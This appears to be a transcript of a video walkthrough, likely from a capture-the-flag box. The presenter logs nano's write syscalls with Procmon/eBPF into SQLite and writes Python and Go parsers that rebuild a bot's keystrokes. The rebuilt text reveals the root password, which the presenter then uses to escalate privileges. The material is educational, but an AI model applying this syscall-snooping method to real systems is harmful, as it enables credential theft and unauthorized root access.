size, and then these three arguments aren't really used. So this is going to be the file descriptor. And then we have the buffer. And then this is going to be the size. I'm guessing the buffer, we have some blank space. We don't have to really read this data because it's logged here. So I bet if we look at the next line, we won't, where that 6 is, it'll still be all zeros. So let's go. Wait, that's a poll. I thought we were only logging writes. We are not. Let's change that to be e-write as well, because that's going to make it really big of a pain to have other ones in. So here's another write. Let's see, what's the size of this? That's 6. Here's 1. So again, file descriptor, the buffer, and then the length. I don't know why the buffer is longer than we expect, right? Because it should only be this right here. And when we looked at it in this, let's specify file nano.db. We're going to have to change the terminal profile. Annoying. But if I look at it like this, can I even highlight? Man, this is awful. This should show information here. I have no idea. Maybe if I load it when I have that. There we go. So we have the buffer. And now clicking. So it looks like whenever you start this program, you don't want to change any information about your terminal, right? So the buffer here, 1B, 5B, 3F, 32, 356C. Clicking also screws things up. But if we look at this in the actual database, it's going to have a lot more information. So that is the very first operation here. So let's send this over to us. Let's go back to our netcat command, send, change our size again. SQLite. So the first one, I don't know why I have audit D there, but this is what we're looking at, I think. 1B, 5B, 3F, 32, and then we have a bunch of extra data that the GUI was kind of just hiding. It's only showing us the 6 bytes. So what we want to do is create a Python program that's going to look at this. And then also, we have a lot of things at the same timestamp. And if you look at the arguments, the argument is identical. And that also doesn't make sense to me. But I'm guessing this is going to be file descriptor. This is the buffer. Then we have the length. And then we have a few blocks of code that are just empty. So let's start a Python program to look at this. And then after Python, I guess we'll try it in Go. It's much, much easier to do in Python. So that's why we're doing it this way. let's see, make dir SQL. Let's just move nano into SQL. And then touch app.py, open up Visual Studio Code. Okay, awesome. So let's start the script off by adding our shebang, user bin and Python 3, import SQLite 3. We probably want to import other things, but we'll leave that for now. Connection, SQLite 3, connect. We want to connect to NanoDB. We set the cursor, and now we can run a query. So let's just do select star from eBPF. And I'm going to say where result code is greater than 0, because the output, the output of write, the result code is how many bytes it wrote to the screen, I believe. So when it writes 0, we don't really care about it, right? So that's why I'm doing where result code is greater than 0. And then let's say for rows in fetch all, let's just assign this to a array like that. And let's see, we can print the row and just test to make sure it works. Python 3 at py. There we go. So that does work. So let's see. Result code is equal to, I want to say that was the 4th row. Print result code. That looks right. And then let's see. The arguments that we send to the write syscall, that's going to be the very last one. So I'm just going to do row -1, and that will get the end. So now what I want to do is, let's see. I wonder what type this is. Does this matter? Result code? Okay. I'm going to call it data is equal to the args, and we're going to go 8 bytes ahead because the very first argument was the file descriptor. That was the 0, 1, then all zeros. So we want to skip the first 8 bytes, and then we only want to read 8 bytes plus whatever the result code is. And then we want to print the data. Okay, so now we want to decode. So we can do .decode like that. Can't decode some things, so let's say errors is equal to ignore. There we go. And if I xxd this, we have a lot more data than it showed, right? And I think the issue could be how it's doing line breaks. We saw that earlier when I did my sed, how like \n didn't look as good as \r when I did that search and replace. And if we man ASCII, \n is 0a. So I also want to replace all line breaks with carriage returns. So we'll do a .replace and then \n with \r. Run this. And that's kind of looking better. Let's see. I think we also have to say end, because every time we run this print, it is also adding a line break. And that's kind of looking better. We may not have enough data. Let's see, xxd, do we see more? Let's see. I'm just seeing if we copy the latest NanoDB. We did. was expecting a little bit more. Result code. Let's see. Print 8 plus result code. Is that command working like we think it is? I think it is. I think we just have to collect more data. Let's run this for a little bit longer. Let's see, decode. Wonder if we get rid of this and print everything. Don't want that. It's gotta be more characters than that. -C, not F. F is loading the file. C is dumping it. So I'm going to let this run. We'll get like 1,000 or 1,500 event codes or calls. Because we may have just not let it run long enough. I think that is all I need, right? We get the result code. We get the arguments. I'm going to do the timestamp thing. So I'm going to say our time is equal to, that was the row after the result code. So we'll say row 5, or we'll null it out first, and then say our time, if our time is equal to row 5, we're going to continue. If it isn't, then we're going to set it. So this should get rid of all the duplicate timestamps, right? Run this. We have ECH. So it's starting to look like it's typing echo. Maybe we just didn't copy the rest of it. That is my hope. I'm going to remove nano.db. We have 1,500 events. I'm going to let it get to 2,000. 1,500 should be good. Those are going to be my famous last words. So let's write to the file. Cat, there we go. I'm going to rerun the script. And there we go. We have it. We see echo, and that's writing the string to sudo. So if we copy the string, we can do su, paste it in, and that is the root password. So if we look at bot.exp, that's the expect script that's running. It's just going to open up nano and then send this 1 byte at a time to nano. So it's just simulating a user typing the keystrokes. And we're able to get to it because when we intercept the right call of nano, it's sending that data to us. And the reason why for the timestamps, let's just look at the data again real quick. Dump less-s, yep. So if we look at this, I got rid of that, shoot. I'm glad that worked. I'm actually surprised because when we were capturing the event, I got rid of logging writes only. So instead of dump, let's do a select star from nanodb where syscall like write. I think that will work. Probably have to put that in double quotes. Select star from ebpf. There we go. This is a better way to view it. We don't even have to do less-s. We don't have the argument, though. Hex arguments. There we go. Okay, so what was I going to say? Right here's the timestamp. And we see some of the timestamps will duplicate. Although I'm not seeing it. Is that timestamp or duration? Let's see. I want to say that's timestamp, but that could be the duration because I'm not seeing any repeats here. Let's do select timestamp result code. Okay. I'm surprised I'm not seeing any zeros as well. I swear some of these timestamps are identical. Curse of the demo god. As soon as I'm trying to explain it, I don't fully understand what's going on. Let's print 1, sort unique-c, sort nr. There are no unique timestamps here. So by that logic, that our time thing I just did here does not matter. Okay, so did not need it there. I swear when I was doing the box before, there were a lot of duplicate timestamps, and I think there were duplicate timestamps when we were showing it before. I wonder if we only get duplicate timestamps when we have a syscall filter. Because in the SQLite, I was grabbing extra data, right? Let's see, select star from eBPF, where, what do we want to say? Syscall, like, right? What's going to happen here? Same thing. So here we filtered for right. I wonder if this is going to change at all. I just erased the database I wanted to keep. Oh well. Select. So now we have the right. Yeah. So I think when we do that select statement, actually, like when we filter for syscall, we get a lot more of the rights. If we didn't do the filter, we didn't see these duplicate timestamps. But when you do the filter, we do. So this has to be something weird going on with Procmon. Maybe it can't log all these syscalls. Like maybe it's a buffer issue and it's dropping a lot of things. I'm not sure what's going on there. But now we see these duplicate times, right? So if I run my script again, we see a lot of like duplicate things. And that's again because of the timestamp, right? So we want to say, we'll just run this. You'll see the same exact output. We want to do where result code is greater than 0. Still have duplicate. So if I add this in, so we're going to ignore any file, like any duplicate timestamps, then it starts echoing. And I didn't capture enough data for us to see the entire command there. We should have left that capture running longer. If we pipe it to XXD, maybe the data's there and some ANSI code is like deleting it, but you get what's going on. I'm going to put this right call again. I'm going to pause the video. We're going to capture a lot of events and then run the script again and then convert this to golang and run it, then call it a video. Okay, we have 6,000 events. This should be good enough. I don't know what we captured last time, but let's send this over. Okay. And then I want to look at this. We do have a lot of duplicate timestamps here. We can see that. Like 53, 53, like all these are duplicate. It's so odd that you only see these duplicate timestamps when you are filtering the event code, but we'll ignore that. Running the Python script, it did not give what I expected. This all looks good to me. Let's see. Definitely have a lot of data. It's 2 dots, 0D. I wonder if, because when I saw the 0As and I replaced them with carriage returns, that was before we did the end this. What if we want new lines instead of carriage returns? Because 0D, that is a carriage return, right? 0A is new line. Yeah. So I wonder if that's the issue. There we go. That's the issue. So we wanted to get rid of all the carriage returns because I think the carriage return is like going back to the beginning of the string in that terminal. It's when you get into like the whole like ANSI encoding things, it's weird, right? But we want to do new lines to make sure we always go on a new line. I wonder if we could do \r\n. That also works. But yeah, so that is the, I guess, correct way to do this. And it probably would have worked before if I had caught myself with the replace in the wrong direction. But that is the Python script. Let's go over to Golang, which is going to be a little bit more complicated. And actually, before we do that, we can show what happens if we have duplicate timestamps. You can see a lot of it is repeating, right? So we can see like this timestamp appeared 224 times. So quite a bit. So that's why we need to get rid of the duplicate timestamps. So the issue with doing this in Golang, and I wouldn't call it an issue, it's just like the differences in programming. Go is going to be like a typed language. So right here where we just say, give me all the rows, and then we can reference them like this, it's not going to be so easy in Golang because before we do the query, we have to pretty much assign what each value is. Is it an integer? Is it a string? Whatnot? So we can read it in the correct way, right? So I'm going to make the directory called Go. Let's call this go mod init. I'll call it Go Procmon write analysis. That is a really long name. That's probably a bad name for the program, but oh well. Touch main.go, and then let's do code dot, and we can open up VS Code to begin the project. And let's start the project with a package main, and then we want to import, and we're going to download the SQLite 3 module. So we'll do go SQLite. And one of the differences between Go and Python is a lot of Go, you use the standard library, but there's going to be some things like SQLite, Postgres, that's not included in the standard library that you have to just pull. And you normally do that per project. So it's not going to be like Python where just you have all your libraries in one central location. And then if you just import it and you have it, it just works. Instead, we do a go get, and that's going to add it to the project. So if we now go to go.mod, you can see the library was added here. So this is kind of like the requirements.txt in Python, right? But now we have the SQLite, so we can import this. So we do github.com. What was it? matn go SQLite 3, like that. And that should be imported. Func main. So let's start this. We can do db error sql.open, the SQLite 3 driver, then nano db was the file name. If error is nil, I'm just going to panic because we're in main. Normally you wouldn't say panic, you just return error. But since we're in main, panic is fine. That's the only place I really ever recommend doing panic. If I save it, we can see we automatically grab database SQL. So now let's do rows error db query. And this is where we want to do our select. So we can do star from ebpf, where, I don't know, I have the S there. Result code is greater than 0. And I'm actually not going to do select star. We're just going to do the rows we want because, like I said before, we have to define each row. So I'm going to do result code, timestamp, args. Is that all we want? Do we just want 3? Let's look at our Python code real quick. Let's see, app.py. Let's see, we did, this is timestamp, that's result code, and that's args. So that should be all we need. We should just need these 3. Okay. So if error is nil, again, we can panic. And then we defer. So let's see. This may be fine. I'm trusting Copilot too much here. Let's do var our time. Let's initialize it here. And the reason why I'm initializing it here, not in the loop, because if I initialize inside of the loop, every time that loop goes to the next iteration, our time would be back to 0, right? We'd have to reinitialize it. So that's why I'm initializing it outside of the loop. So that way this value stays. So we can do that. And then let's see. We can say for rows next. So we're looping through. And we want to initialize all our values. So we have our time, that's int64. Result code, I want to say that was just integer. We can actually, let's see, CP, nano, let's call it go. SQLite 3, .dump, less. We could just run schema. That would probably be the better thing, right? Is it dot schema? There we go. So PID we're not getting. Stack trace we ignored. Result code integer. Timestamp integer. Syscall text, duration, arguments blob. So our time, you can also leave this as int. That's the timestamp. We'll call this last time. Timestamp's going to be int. And then args is going to be an array of bytes. Okay. So here we're doing the row scan and then sending the data to each of these variables. Panic error. Then we can say if last time is equal to timestamp, then we continue. Last time is equal to timestamp. And then now all we want to do is print the buffer. So what we want to get is print args. And I think we can do 8 and then 8 plus result code, just like we did in Python. That may be it. Oh no, we probably have to do the strip. I wonder if this program will even run. No such column args. What was it? Arguments. Okay. That's looking better. But we just printed way too much data. Let's convert this into a string. That looks better. This looks exactly like before we did the replace. So let's just say output is equal to this. And then we can do print strings dot replace. Replace this. This -1 replace unlimited instances, I believe. Yeah, the number of times. And there we go. That is the program in Go. A little bit different than Python, but yeah. Not sure exactly why I decided to show this, but I do want to show more Go stuff in the future. So I guess that's why. Before I wrap up the video, let's just go over the code and explain it. There's one thing that you may be curious about if you don't come from Go, and that's going to be this walrus operator when I do the semicolon equals. That means the variable has not been initialized and I want to set it, right? So we can see, let's see, when I do it here, this last time, I'm not doing this operator, but it would work in the loop. And that's the case of, I want to say it's called like variable shadowing, and it's very bad when you have a variable outside the loop and inside. Right here, it's saying it's erroring because we declared it and never used it. Because we created a second instance of this variable because we're in the loop. So when you just do it with a equals without the colon, that means you're using the variable that already exists. And if I did it here, we're going to error again because output doesn't exist anywhere. And you can't equal something that's not declared, right? We could say var output is string, and now this suddenly works. I'm guessing this is like a linting issue, right? Yeah, should merge it with the next line. But all this is doing is saying whatever type of variable this is, create it on this side of the equation and use the same type, right? So like if var output, if that was a string of bytes, we're going to error because it doesn't match, right? Because this is bytes now and this is a string. So the walrus operator just means initialize the variable and set it. And again, this isn't really a thing in Python because no matter what, when you do the equals, it'll automatically convert the types for you. But in Go, you just need to know the type beforehand. A lot of people hate it, but I think it becomes a really good thing once you start doing more complex things. The other things a lot of people hate is like all the error handling, but I do enjoy it as well. So hopefully that starts making sense. I'm seeing if there's anything else in this code that's confusing. I don't think so, but if you have questions, always let me know in the comments and I'll do my best to answer them or address them the next time it comes up in video. And with that being said, take care all, and I'll see you all next time.